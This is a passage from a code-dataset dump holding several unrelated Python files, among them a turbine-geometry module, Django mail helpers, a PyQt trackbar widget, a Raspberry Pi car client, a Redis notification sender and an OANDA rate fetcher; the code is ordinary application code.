TONC = np.array([0.2, 0.2, 0.2, 0.2]) #Blade thickness/chord\r\n TE = np.array([0.0008, 0.0006, 0.0008, 0.0006])\r\n OONS = np.array([0.34, 0.34, 0.34, 0.34]) #Throat/pitch\r\n CLR = np.array([0, 0.00025, 0, 0.00025])\r\n\r\n rows = s.size\r\n\r\n r_EULER_LE = np.zeros([rows], dtype=float)\r\n r_EULER_TE = np.zeros([rows], dtype=float)\r\n O = np.zeros([rows], dtype=float)\r\n A_LE = np.zeros([rows], dtype=float)\r\n A_TE = np.zeros([rows], dtype=float)\r\n A_TH = np.zeros([rows], dtype=float)\r\n h = np.zeros([rows], dtype=float)\r\n ClONH = np.zeros([rows], dtype=float)\r\n v_n = np.zeros([rows], dtype=float)\r\n v_n_gap = np.zeros([rows-1], dtype=float)\r\n AR = np.zeros([rows], dtype=float)\r\n HubTipRatio = np.zeros([rows], dtype=float)\r\n rTEONO = np.zeros([rows], dtype=float)\r\n\r\n\r\n for i in range(0, rows):\r\n r_EULER_LE[i] = math.sqrt((r_hub_LE[i]**2+r_tip_LE[i]**2)/2)\r\n r_EULER_TE[i] = math.sqrt((r_hub_TE[i]**2+r_tip_TE[i]**2)/2)\r\n\r\n for i in range(0, rows):\r\n if s[i] >= 1:\r\n s[i] = 2*math.pi*r_EULER_TE[i]/s[i]\r\n\r\n O[i] = OONS[i]*s[i] #Throat\r\n\r\n A_LE[i] = math.pi*(r_tip_LE[i]**2 - r_hub_LE[i]**2)\r\n A_TE[i] = math.pi*(r_tip_TE[i]**2 - r_hub_TE[i]**2)\r\n A_TH[i] = OONS[i]*(5*A_TE[i]+A_LE[i])/6 #Throat area according to Ainley\r\n\r\n #Average blade height\r\n h[i] = (r_tip_LE[i] - r_hub_LE[i] + r_tip_TE[i] - r_hub_TE[i])/2\r\n\r\n ClONH[i] = CLR[i]/h[i] #clearance / blade height\r\n\r\n #Angular change of Euler radius\r\n v_n[i] = math.atan((r_EULER_TE[i]-r_EULER_LE[i])/b[i])\r\n\r\n\r\n if i<(3):#kolla denna här\r\n v_n_gap[i] = math.atan((r_EULER_LE[i+1]-r_EULER_TE[i])/(x_LE[i+1]-x_TE[i]))\r\n\r\n AR[i] = h[i]/b[i]\r\n HubTipRatio[i] = (r_hub_LE[i] + r_hub_TE[i])/(r_tip_LE[i] + r_tip_TE[i])\r\n rTEONO[i] = TE[i] /O[i]\r\n\r\n return r_EULER_LE, r_EULER_TE, s, O, A_LE, A_TE, A_TH, h, ClONH, v_n, v_n_gap, AR, HubTipRatio, rTEONO, angle_in_blade,\r\n\r\ndef P_inlet():\r\n p = 8 #Turbine inlet pressure (Bar)\r\n return 101325*p\r\n\r\ndef P_outlet():\r\n return 101325*1\r\n\r\ndef T_inlet():\r\n t_inlet = 826.85 #turbine inlet temp.\r\n return t_inlet\r\n\r\ndef etap():\r\n return 0.85 #polytropic efficiency\r\n","sub_path":"indata.py","file_name":"indata.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"643638743","text":"#!/usr/bin/env python\n# vim: set fileencoding=utf-8 :\n# Created by Andre Anjos \n# Ter 01 Set 2009 17:27:34 CEST \n\n\"\"\"Mail functions.\n\"\"\"\n\nfrom django.conf import settings\nfrom django.core.mail import send_mail\nfrom django.template import loader, RequestContext\nfrom django.utils import translation\nfrom project.util import fix_apos\n\ndef mail_somebody(request, object, subject_template, message_template):\n if not object.email: return False\n context = RequestContext(request, {'object': object})\n translation.activate(object.language)\n subject = fix_apos(loader.render_to_string(subject_template, context))\n subject = subject.replace('\\n','')\n to = u'%s <%s>' % (object.get_full_name(), object.email)\n sender = settings.DEFAULT_FROM_EMAIL\n message = fix_apos(loader.render_to_string(message_template, context))\n translation.deactivate()\n send_mail(subject=subject, message=message, from_email=sender, recipient_list=(to,))\n\ndef mail_managers(request, object, subject_template, message_template):\n \"\"\"Mails managers summarizing something.\"\"\"\n context = RequestContext(request, {'object': object})\n subject = fix_apos(loader.render_to_string(subject_template, context))\n subject = subject.replace('\\n','')\n message = fix_apos(loader.render_to_string(message_template, context))\n to = []\n for r in settings.MANAGERS: to.append(u'%s <%s>' % (r[0], r[1]))\n sender = settings.DEFAULT_FROM_EMAIL\n send_mail(subject=subject, message=message, from_email=sender, recipient_list=to)\n\ndef mail_submitter(request, object):\n \"\"\"Mails a user about a new object created on its name.\"\"\"\n subject_template = 'submitter_subject.txt'\n message_template = 'submitter_message.txt'\n mail_somebody(request, object, subject_template, message_template)\n\ndef mail_submission(request, object):\n \"\"\"Mails managers summarizing something.\"\"\"\n subject_template = 'submission_subject.txt'\n message_template = 'submission_message.txt'\n mail_managers(request, object, subject_template, message_template)\n\ndef mail_confirmation(request, object):\n \"\"\"Mails a user about the confirmation of its subscription to a session.\"\"\"\n subject_template = 'confirmation_subject.txt'\n message_template = 'confirmation_message.txt'\n mail_somebody(request, object, subject_template, message_template)\n\ndef mail_submission_confirmation(request, object):\n \"\"\"Mails managers summarizing something.\"\"\"\n subject_template = 'confirmation_admin_subject.txt'\n message_template = 'confirmation_admin_message.txt'\n mail_managers(request, object, subject_template, message_template)\n","sub_path":"project/training/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"443030840","text":"import tensorflow as tf\nimport sys\nimport numpy as np\n\nimport FID as F\n\ndef nchw2nhwc(imgs):\n return np.transpose(imgs, [0, 2, 3, 1])\n\ndef nhwc2nchw(imgs):\n return np.transpose(imgs, [0, 3, 1, 2])\n\nprint ('FID of data of files \"', sys.argv[1], '\" and \"', sys.argv[2], '\": ')\n\ngen_data = []\nreal_data = []\n# Default is nhwc:\nnchw = False\n\nassert len(sys.argv) >= 2, 'Invalid number of atguments'\n\nif len(sys.argv) == 3 and (sys.argv[2] == '-NCHW' or sys.argv[2] == '-nchw'):\n nchw = True\nif len(sys.argv) == 4 and (sys.argv[3] == '-NCHW' or sys.argv[3] == '-nchw'):\n nchw = True\n\nassert sys.argv[1].endswith('.npy'), 'Input file of generated data must be .npy'\nassert sys.argv[2].endswith('.npy'), 'Input file of real data must be .npy'\ngen_data = np.load(sys.argv[1])\nprint( 'Generated data loaded...')\nreal_data = np.load(sys.argv[2])\nprint( 'Real data loaded...')\n\nif nchw == False:\n print('Transposing Data...')\n gen_data = nhwc2nchw(gen_data)\n real_data = nhwc2nchw(real_data)\n \n\nsplitnum = 1;\n\nprint ('Calculating Frechet Inception Distance...')\nFIDS = F.FID(gen_data, real_data, splitnum)\nprint ('FID of data of files \"', sys.argv[1], '\" and \"', sys.argv[2], '\": ', FIDS)\n","sub_path":"eval/FIDFile.py","file_name":"FIDFile.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"237813671","text":"\"\"\"Constants used in the `pypesto.predict` module.\"\"\"\n\n\nMODE_FUN = 'mode_fun' # mode for function values\nMODE_RES = 'mode_res' # mode for residuals\n\nOUTPUT_IDS = 'output_ids' # data member in PredictionConditionResult\nPARAMETER_IDS = 'x_names' # data member in PredictionConditionResult\nCONDITION_IDS = 'condition_ids'\nTIMEPOINTS = 'timepoints' # data member in PredictionConditionResult\nOUTPUT = 'output' # field in the return dict of AmiciPredictor\nOUTPUT_SENSI = 'output_sensi' # field in the return dict of AmiciPredictor\nOUTPUT_WEIGHT = 'output_weight' # field in the return dict of AmiciPredictor\nOUTPUT_SIGMAY = 'output_sigmay' # field in the return dict of AmiciPredictor\n\n# separator in the conditions_ids betweeen preequilibration and simulation\n# condition\nCONDITION_SEP = '::'\n\nRDATAS = 'rdatas' # return field of call to pypesto objective\nAMICI_T = 't' # return field in amici simulation result\nAMICI_X = 'x' # return field in amici simulation result\nAMICI_SX = 'sx' # return field in amici simulation result\nAMICI_Y = 'y' # return field in amici simulation result\nAMICI_SY = 'sy' # return field in amici simulation result\nAMICI_LLH = 'llh' # return field in amici simulation result\nAMICI_STATUS = 'status' # return field in amici simulation result\nAMICI_SIGMAY = 'sigmay' # return field in amici simulation result\n\nCSV = 'csv' # return file format\nH5 = 'h5' # return file format\nTIME = 'time' # column name in returned csv\n\nCONDITION = 'condition'\nCONDITION_IDS = 'condition_ids'\n\n\ndef get_condition_label(condition_id: str) -> str:\n \"\"\"Convert a condition ID to a label.\n\n Labels for conditions are used at different locations (e.g. ensemble\n prediction code, and visualization code). This method ensures that the same\n condition is labeled identically everywhere.\n\n Parameters\n ----------\n condition_id:\n The condition ID that will be used to generate a label.\n\n Returns\n -------\n The condition label.\n \"\"\"\n return f'condition_{condition_id}'\n","sub_path":"pypesto/predict/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"244001669","text":"import os\nimport sys\n\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtNetwork import *\n\nfrom qex import *\n\nclass QTrackBar(QWidget):\n '''\n 刻度条(带刻度的进度条)\n '''\n\n def __init__(self, name = \"\", value = 0.0, unit = \"\", minValue = 0, maxValue = 200, precisionRuler = 0, precisionTitle = 1, parent = None):\n super(QTrackBar, self).__init__()\n self.parent = parent\n\n self.name = \"\"\n self.unit = \"\"\n\n self.maxValue = 100\n self.minValue = 0\n self.value = 0.0\n\n self.precisionRuler = 0 # 小数点保留几位\n self.precisionTitle = 1 \n\n self.longStep = 10 # 长线条等分步长\n self.shortStep = 1 # 短线条等分步长 \n self.space_top = 20 \n self.space_bottom = 20\n self.space_left = 30\n self.space_right = 30\n\n self.color_line = QColor(255, 255, 255)\n self.color_title = QColor(0, 255, 0)\n \n self.color_back_start = QColor(100, 100, 100)\n self.color_back_end = QColor(60, 60, 60)\n \n self.color_back_bar = QColor(220, 220, 220)\n self.color_fore_bar = QColor(100, 184, 255)\n\n self.setupUi()\n\n self.setName(name)\n self.setValue(value)\n self.setUnit(unit)\n self.setRange(minValue, maxValue)\n self.setPrecisionRuler(precisionRuler)\n self.setPrecisionTitle(precisionTitle)\n\n ''' 私有方法 '''\n def setupUi(self):\n self.setWindowFlags(Qt.Window | Qt.FramelessWindowHint)\n self.setAttribute(Qt.WA_TranslucentBackground, True)\n self.setMouseTracking(True)\n self.setFont(QFont(\"MicroSoft Yahei\", 8))\n self.setFixedSize(120, 350)\n\n def paintEvent(self, event):\n event.accept()\n\n # 反走样\n painter = QPainter(self)\n painter.setRenderHint(QPainter.Antialiasing, True)\n\n # 绘制背景\n self.drawBack(painter)\n # 绘制标题栏\n self.drawTitle(painter)\n # 绘制标尺\n self.drawRuler(painter)\n # 绘制柱状条背景\n self.drawBarBack(painter)\n # 绘制柱状条前景\n self.drawBarFore(painter)\n\n def drawBack(self, painter):\n painter.save()\n painter.setPen(Qt.NoPen)\n lg = QLinearGradient(QPointF(0, 0), QPointF(0, self.height()))\n lg.setColorAt(0.0, self.color_back_start)\n lg.setColorAt(1.0, self.color_back_end)\n painter.setBrush(lg)\n painter.drawRect(self.rect())\n painter.restore()\n\n def drawTitle(self, painter):\n painter.save()\n painter.setPen(self.color_title)\n \n point_name = QPointF(10, self.space_top)\n painter.drawText(point_name, self.name)\n\n str_title = float2str(self.value, self.precisionTitle) + \" \" + self.unit\n fontWidth = painter.fontMetrics().width(str_title)\n pointValue = QPointF(self.width() - fontWidth - 10, self.space_top)\n painter.drawText(pointValue, str_title)\n painter.restore()\n\n def drawRuler(self, painter):\n painter.save()\n painter.setPen(QColor(self.color_line))\n initX = self.space_left + 20\n initY = self.space_top + 20\n\n pointTop = QPointF(initX, initY)\n pointBtm = QPointF(initX, self.height() - self.space_bottom)\n painter.drawLine(pointTop, pointBtm)\n\n length = self.height() - self.space_bottom - initY\n increment = length / (self.maxValue - self.minValue)\n\n longLineLength = 10\n shortLineLength = 7\n\n for num in range(self.maxValue, self.minValue-1, -self.shortStep):\n if num % self.longStep == 0 or num == self.minValue:\n pointLeft = QPointF(initX, initY)\n pointRight = QPointF(initX + longLineLength, initY)\n painter.drawLine(pointLeft, pointRight)\n\n str_num = float2str(num, self.precisionRuler)\n fontWidth = painter.fontMetrics().width(str_num)\n fontHeight = painter.fontMetrics().height()\n pointText = QPointF(initX - fontWidth - 5, initY + fontHeight / 3)\n painter.drawText(pointText, str_num);\n else:\n if num % (self.longStep / 2) == 0:\n shortLineLength =7\n else:\n shortLineLength = 4 \n\n pointLeft = QPointF(initX, initY)\n pointRight = QPointF(initX + shortLineLength, initY)\n painter.drawLine(pointLeft, pointRight)\n\n initY += increment * self.shortStep\n\n painter.restore()\n\n def drawBarBack(self, painter):\n painter.save()\n painter.setPen(Qt.NoPen)\n\n initX = self.space_left + 20 + 20\n pointLeftTop = QPointF(initX, self.space_top + 20)\n pointRightBtm = QPointF(self.width() - self.space_right, self.height() - self.space_bottom)\n rectBack = QRectF(pointLeftTop, pointRightBtm)\n\n painter.setBrush(self.color_back_bar)\n painter.drawRect(rectBack)\n\n painter.restore()\n\n def drawBarFore(self, painter):\n painter.save()\n painter.setPen(Qt.NoPen)\n\n height_back = self.height() - self.space_bottom -self.space_top -20\n \n increment = height_back / (self.maxValue - self.minValue)\n height_select = (self.value - self.minValue) * increment\n\n pointLeftTop = QPointF(self.space_left + 20 + 20, self.height() - self.space_bottom - height_select )\n pointRightBtm = QPointF(self.width() - self.space_right, self.height() - self.space_bottom)\n rectFore = QRectF(pointLeftTop, pointRightBtm)\n\n painter.setBrush(self.color_fore_bar)\n painter.drawRect(rectFore)\n\n painter.restore()\n\n '''公开方法'''\n # 设置名称\n def setName(self, name):\n if self.name != name:\n self.name = name\n self.update()\n\n # 设置值\n def setValue(self, value):\n if value > self.maxValue: return\n if self.value != value:\n self.value = value\n self.update()\n\n # 设置单位\n def setUnit(self, unit):\n if self.unit != unit:\n self.unit = unit\n self.update()\n\n # 设置范围\n def setRange(self, minValue, maxValue):\n if minValue >= maxValue: return\n if self.minValue != minValue or self.maxValue != maxValue:\n self.minValue = minValue\n self.maxValue = maxValue\n self.update()\n\n # 设置最小值\n def setMinValue(self, minValue):\n if minValue >= self.maxValue: return\n if self.minValue != minValue:\n self.minValue = minValue\n self.update()\n\n # 设置最大值\n def setMaxValue(self, maxValue):\n if maxValue <= self.minValue: return\n if self.maxValue != maxValue:\n self.maxValue = maxValue\n self.update()\n\n # 设置刻度值文本的小数点位数\n def setPrecisionRuler(self, precision):\n if precision > 3: return\n if self.precisionRuler != precision:\n self.precisionRuler = precision\n self.update()\n\n # 设置标题值文本的小数点位数\n def setPrecisionTitle(self, precision):\n if precision > 5: return\n if self.precisionTitle != precision:\n self.precisionTitle = precision\n self.update()\n\n # 设置刻度长步长\n def setLongStep(self, step):\n if self.longStep != step:\n self.longStep = step\n self.update()\n \n # 设置刻度短步长\n def setShortStep(self, step):\n if self.shortStep != step:\n self.shortStep = step\n self.update()\n\n # 设置刻度值文本颜色\n def setLineColor(self, color):\n if self.color_line != color:\n self.color_line = color\n self.update()\n\n # 设置标题文本颜色\n def setTitleColor(self, color):\n if self.color_title != color:\n self.color_title = color\n self.update()\n\n # 设置背景颜色渐变开始\n def setBackColorStart(self, color):\n if self.color_back_start != color:\n self.color_back_start = color\n self.update()\n\n # 设置背景颜色渐变结束\n def setBackColorEnd(self, color):\n if self.color_back_end != color:\n self.color_back_end = color\n self.update()\n\n # 设置条状背景颜色\n def setBarBackColor(self, color):\n if self.color_back_bar != color:\n self.color_back_bar = color\n self.update()\n\n # 设置条状前景颜色\n def setBarForeColor(self, color):\n if self.color_fore_bar != color:\n self.color_fore_bar = color\n self.update()\n\n # 获取数值\n def getValue(self):\n return self.value\n\n # 获取最小值\n def getMinValue(self):\n return self.minValue\n\n # 获取最大值\n def getMaxValue(self):\n return self.maxValue\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n w = QTrackBar(\"xx\", 50.365, \"℃\")\n w.setLongStep(20)\n w.setShortStep(2)\n w.show()\n app.exec()","sub_path":"QMyPlugin/qsliderbar.py","file_name":"qsliderbar.py","file_ext":"py","file_size_in_byte":9244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"626274836","text":"# -*- coding: utf-8 -*-\n# File: res_partner.py\n# Author: Israel Calderón\n# Copyright: (C) 2019 All rights reserved by Madkting\n# Created: 2019-08-01\n\nfrom odoo import models, api\n\nfrom ..log.logger import logger\n\n\nclass Base(models.AbstractModel):\n # events notifiers\n _inherit = 'base'\n\n @api.model\n def create(self, vals):\n record = super(Base, self).create(vals)\n try:\n self._event('on_record_create').notify(record, fields=vals.keys())\n except Exception as ex:\n logger.exception(ex)\n return record\n\n def write(self, vals):\n record = super(Base, self).write(vals)\n try:\n self._event('on_record_write').notify(record, fields=vals.keys())\n except Exception as ex:\n logger.exception(ex)\n return record\n","sub_path":"madkting/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"612267589","text":"\"\"\" Project Entrance.\n\"\"\"\nfrom __future__ import absolute_import, division, print_function\nimport sys\nimport io\nimport struct\nimport time\nimport picamera\nimport threading\nimport socket\nfrom math import atan, floor\nfrom os.path import join\nimport numpy as np\nfrom PIL import Image\n\nfrom control.controller import Controller\n# from control.car_avoid import CarAvoid\nfrom control.processImage import processImage\nfrom util.detect import Detector\nfrom util import img_process\nfrom config import configs\nimport client\n\nIMG_W = configs['data']['image_width']\nIMG_H = configs['data']['image_height']\nNUM_OF_POINTS = configs['fitting']['num_of_points']\nLOW_LANE_COLOR = np.uint8([[[0,0,0]]])\nUPPER_LANE_COLOR = np.uint8([[[0,0,0]]]) + 40\nCENTER_W, CENTER_H = int(IMG_W / 2), int(IMG_H / 2)\n\nclass Car(object):\n \"\"\" Offline car-control, with only one thread.\n \"\"\"\n def __init__(self):\n self.contorller = Controller()\n # self.avoid = CarAvoid()\n self.detector = Detector()\n self.pre_img_id = -1\n self.cur_img_id = -1\n\n @staticmethod\n def unpackage_paras(packaged_parameters):\n \"\"\" Unpackage the parameters.\n @Paras:\n packaged_parameters: np array\n @Returns:\n distance_to_center\n \"\"\"\n cur_paras = packaged_parameters[0:13]\n w_left, w_right, w_middle = cur_paras[0:3], cur_paras[3:6], cur_paras[6:9]\n distance_to_center = cur_paras[9]\n distance_at_middle = cur_paras[10]\n radian = cur_paras[11]\n curvature = cur_paras[12]\n stop_signal = (np.all(w_left == np.zeros(3)) and np.all(w_right == np.zeros(3)))\n return distance_to_center, distance_at_middle, curvature, stop_signal\n\n @staticmethod\n def unpackage_paras_from_buffer(buffer):\n \"\"\" Unpackage the parameters from buffer.\n @Paras:\n buffer: str\n The recv buffer.\n Note that the default recv size should be 112 (np.array(13, dtype=float64))\n @Returns:\n distance_to_tangent\n angle_of_tangent\n \"\"\"\n num_of_paras = floor(len(buffer) / 128)\n packaged_parameters = np.frombuffer(buffer, dtype=np.float64).reshape(int(16 * num_of_paras))\n if len(packaged_parameters) < 16:\n return -1, 0, 0, False\n cur_paras = packaged_parameters[0:16]\n image_id = int(cur_paras[0])\n w_left, w_right = cur_paras[1:4], cur_paras[4:7]\n distance_to_tangent = cur_paras[14]\n angle_of_tangent = cur_paras[15]\n stop_signal = (np.all(w_left == np.zeros(3)) and np.all(w_right == np.zeros(3)))\n return image_id, distance_to_tangent, angle_of_tangent, stop_signal\n\n def send_images(self, connection, stream):\n \"\"\" Send images. Single thread, will block.\n Helper function for online mode.\n \"\"\"\n connection.write(struct.pack('= 34: \n # # no car => lane keeping \n # self.contorller.make_decision('adp_lane_keeping_decision', dis_2_tan, radian_at_tan)\n # else:\n # self.contorller.make_decision('manual_follow_decision', dis_2_tan, radian_at_tan, distance2car)\n stream.seek(0)\n stream.truncate()\n\n def run_online(self, ip, port):\n pass\n\n def run_online_single(self, ip, port):\n client_socket = socket.socket()\n client_socket.connect((ip, port))\n connection = client_socket.makefile('wb')\n first_start = True\n with picamera.PiCamera() as camera:\n camera.resolution = (640, 480)\n camera.framerate = 30\n time.sleep(1)\n stream = io.BytesIO()\n for _ in camera.capture_continuous(stream, 'jpeg', use_video_port=True):\n start_time = time.time()\n self.send_images(connection, stream)\n self.recv_parameters(client_socket)\n if first_start:\n self.contorller.start()\n first_start = False\n print('processed img ' + str(self.cur_img_id), time.time() - start_time)\n connection.write(struct.pack(' 50 and customer_budget <= 100:\r\n print(\"You have a sufficant balance avaliable for any purchase on this store.\")\r\n\r\n elif customer_budget == jackpot:\r\n print(\"You have won the jackpot, use the discount code yes next time you purchase anything from our store!\")\r\n\r\nif menu == '3':\r\n print(\"Thanks for visiting us, have an awesome day!\")\r\n time.sleep(2)\r\n\r\n","sub_path":"shopping_store_version_2.py","file_name":"shopping_store_version_2.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"100960677","text":"\nimport ast\nimport json\n\nimport redis\n\nfrom libapp import app, pubsubd\nfrom libapp.config import libconf, pushconf, smsconf\nfrom libapp.notifications.emailnotifications import EmailNotifications\nfrom libapp.notifications.push import Push\nfrom libapp.notifications.sms import Sms\n\nqueue = redis.StrictRedis(host=libconf.REDIS_HOST, port=libconf.REDIS_PORT, db=libconf.DB_INDEX)\n\n\ndef publish_msg(source_q=libconf.PUB_EMAIL_Q, dest_q=libconf.EMAIL_Q):\n q_length = queue.llen(source_q)\n app.logger.info(\"Publisher {queue} length: {data}\".format(queue=source_q, data=q_length))\n if q_length > 0:\n for _ in range(q_length):\n msg_data = queue.rpop(source_q)\n queue.publish(dest_q, msg_data)\n\n\ndef subscribe_msg():\n message = pubsubd.get_message()\n while message is not None:\n data = message.get('data')\n app.logger.info(\"Subscriber read: {data}\".format(data=data))\n if data and type(data) is not long:\n msg_dict = json.loads(data)\n msg_type = msg_dict.get(\"msg_type\", \"\")\n to = msg_dict.get(\"to\", \"\")\n category = msg_dict.get(\"category\", \"\")\n author = msg_dict.get(\"author\", \"\")\n template = msg_dict.get(\"template\", \"\")\n message_content = msg_dict.get(\"message_content\", \"\")\n\n if isinstance(message_content, unicode):\n app.logger.info(\"Error: {data}\".format(data=type(message_content)))\n message_content = ast.literal_eval(message_content)\n\n if msg_type == \"email\":\n # It is email notification\n from_email = msg_dict.get(\"from_email\", \"\")\n subject = msg_dict.get(\"subject\", \"\")\n\n # Call email notifier\n email_obj = EmailNotifications()\n email_obj.message_notifier(msg_type=msg_type, author=author, category=category, template=template,\n from_email=from_email, to=to, subject=subject,\n message_content=message_content)\n elif msg_type == \"sms\":\n # It is sms notification\n senderid = msg_dict.get(\"senderid\", smsconf.SENDERID.OFFICE.name)\n accusage = msg_dict.get(\"accusage\", smsconf.ACCUSAGE.trans.value)\n\n # Call sms notifier\n sms_obj = Sms()\n sms_obj.message_notifier(msg_type=msg_type, author=author, category=category, template=template,\n senderid=senderid, mobile=to, accusage=accusage,\n message_content=message_content)\n elif msg_type == \"push\":\n # It is Push notification\n is_json = pushconf.IS_JSON\n retries = pushconf.RETRIES\n if \"is_json\" in message_content:\n is_json = message_content.get(\"is_json\", False)\n message_content.pop(\"is_json\", None)\n if \"retries\" in message_content:\n retries = message_content.get(\"retries\", pushconf.RETRIES)\n message_content.pop(\"retries\", None)\n\n registration_id = None\n registration_ids = None\n if to and len(to) == 1:\n registration_id = to[0]\n is_json = False\n elif to and len(to) > 1:\n registration_ids = to\n else:\n pass\n\n # Call push notifier\n push_obj = Push()\n push_obj.message_notifier(msg_type=msg_type, author=author, category=category, template=template,\n is_json=is_json, retries=retries, registration_ids=registration_ids,\n registration_id=registration_id, message_content=message_content)\n else:\n # Its a web notification\n pass\n\n message = pubsubd.get_message()\n","sub_path":"libapp/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":4047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"427965395","text":"\nfrom Qt import QtCore, QtWidgets\nfrom . import api\nfrom .PaymentsView import PaymentsView\n\n\nclass MainWindow(QtWidgets.QWidget):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.setWindowTitle(\"Debitoor Expenses\")\n mainLayout = QtWidgets.QVBoxLayout()\n self.setLayout(mainLayout)\n\n hbar = QtWidgets.QHBoxLayout()\n mainLayout.addLayout(hbar)\n hbar.addWidget(QtWidgets.QLabel('Account:'))\n self.account = QtWidgets.QComboBox()\n self.account.currentIndexChanged.connect(lambda: self.payments.setAccount(self.getAccount()))\n hbar.addWidget(self.account)\n\n hbar = QtWidgets.QHBoxLayout()\n hbar.addWidget(QtWidgets.QLabel('Search:'))\n self.searchText = QtWidgets.QLineEdit()\n self.searchText.returnPressed.connect(lambda: self.searchButton.clicked.emit())\n self.searchButton = QtWidgets.QPushButton('Go')\n self.searchButton.clicked.connect(lambda: self.payments.setSearchString(self.searchText.text()))\n hbar.addWidget(self.searchText)\n hbar.addWidget(self.searchButton)\n mainLayout.addLayout(hbar)\n\n hbar = QtWidgets.QHBoxLayout()\n mainLayout.addLayout(hbar)\n self.payments = PaymentsView()\n hbar.addWidget(self.payments)\n\n self.initValues()\n\n def initValues(self):\n for account in api.paymentaccounts():\n self.account.addItem(account['accountName'])\n\n def getAccount(self):\n return api.paymentaccounts()[self.account.currentIndex()]\n","sub_path":"app/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"58178797","text":"__author__ = 'Tarek'\r\n\r\n\r\nfrom pylms.server import Server\r\nfrom pylms.player import Player\r\n\r\ndef Play():\r\n sc = Server(hostname=\"10.0.0.76\", port='9090')\r\n sc.connect()\r\n\r\n sqPCroom = sc.get_player(\"00:04:20:2a:70:77\") #computer room SB\r\n sqBedroom = sc.get_player(\"00:04:20:2a:6f:ac\") #bedroom SB\t\r\n\r\n\r\n if sqPCroom.get_power_state() == True:\r\n sqPCroom.set_power_state(False)\r\n \r\n if sqBedroom.get_power_state() == True:\r\n sqBedroom.set_power_state(False)\r\n \r\n\r\ndef main():\r\n Play()\r\n\r\n\r\n\r\nif __name__ == \"__main__\": main()\r\n\r\n\r\n\r\n","sub_path":"snippets/power_off_SBs.py","file_name":"power_off_SBs.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"119010108","text":"class IntRev(object):\n def reverse(self, x):\n \"\"\"\n :type x: int\n :rtype: int\n \"\"\"\n if(x >= -9 and x <=9):\n return x;\n xString = str(x);\n strArray = list(xString);\n i =0;\n j = len(xString)-1;\n if(x < 0):\n i =1;\n while(i < j):\n strArray[i], strArray[j] = strArray[j], strArray[i];\n i +=1;\n j -=1;\n ret = ''.join(strArray);\n result = int(ret);\n if(abs(result) > (2**31)-1):\n return 0;\n else:\n return result;\n \n \n ","sub_path":"IntRev.py","file_name":"IntRev.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"192725015","text":"\"\"\" This is the malt.data.rates module.\n This module is primarily responsible for retriving historical rates from\n a data source, parse them and save them to file.\n\"\"\"\n\n# External imports\nimport csv\nimport datetime\nimport http.client\nimport json\n\n# Internal imports\nfrom malt import common\nlogger = common.get_logger(__name__)\n\n#===============================================================================\n# Functions:\n#===============================================================================\n\ndef get_daily_candles(instrument, start_date, end_date):\n \"\"\" Obtain a list of daily bid-ask candles for the given instrument.\n Candles are from start_date to end_date, both inclusive. Non-trading\n days will be skipped. Candles are aligned according to New York time\n at 17:00.\n\n Args:\n instrument: string. The currency pair. e.g. 'EUR_USD'.\n start_date: string. Formatted start date. e.g. '2015-11-24'.\n end_date: sting. Formatted end date. e.g. '2015-11-28'.\n\n Returns:\n candles: list of dictionaries, each representing a daily candle.\n Example:\n [{'volume': 28947, 'highAsk': 1.07594, 'openAsk': 1.0746,\n 'lowAsk': 1.06757, 'lowBid': 1.06741, 'closeBid': 1.06853,\n 'closeAsk': 1.06871, 'openBid': 1.07378,\n 'time': '2015-11-15T22:00:00.000000Z',\n 'complete': True, 'highBid': 1.07574}, {...}]\n \"\"\"\n # Construct request url.\n url = (\"/v1/candles?instrument={0}&start={1}&end={2}&\"\n \"candleFormat=bidask&granularity=D&dailyAlignment=17&\"\n \"alignmentTimezone=America%2FNew_York\"). \\\n format(instrument, start_date, end_date)\n\n # Open connection. Send request. Get response.\n # TODO: Distinguish between game and trade.\n conn = http.client.HTTPSConnection(common.GAME_URL)\n conn.request(\"GET\", url, \"\", common.GAME_HEADER)\n response = conn.getresponse()\n response_content = response.read().decode()\n conn.close()\n\n # Parse the JSON from the response and select 'candles'.\n candles = json.loads(response_content)['candles']\n\n # Check received candles are valid.\n assert (len(candles[0]) == 11 and\n set(common.CANDLE_FEATURES).issubset(set(candles[-1].keys())))\n\n # Log\n logger.info(\"Fetched daily candles for %s.\", instrument)\n\n return candles\n\n\ndef write_candles_to_csv(candles, out_file):\n \"\"\" Write the candles to the out_file file as a csv.\n\n Args:\n candles: list of dictionaries. List of candles containing open,\n close, high and low of bid and ask, time and volume.\n out_file: string. Location of the output file.\n\n Returns:\n void.\n \"\"\"\n # Write each candle line by line.\n with open(out_file, 'w') as csv_handle:\n\n # Write the headers first.\n writer = csv.writer(csv_handle, delimiter=' ')\n writer.writerow(common.CANDLE_FEATURES)\n\n # Initialize candle.\n candle = None\n for candle in candles:\n # Need to eliminate weekend 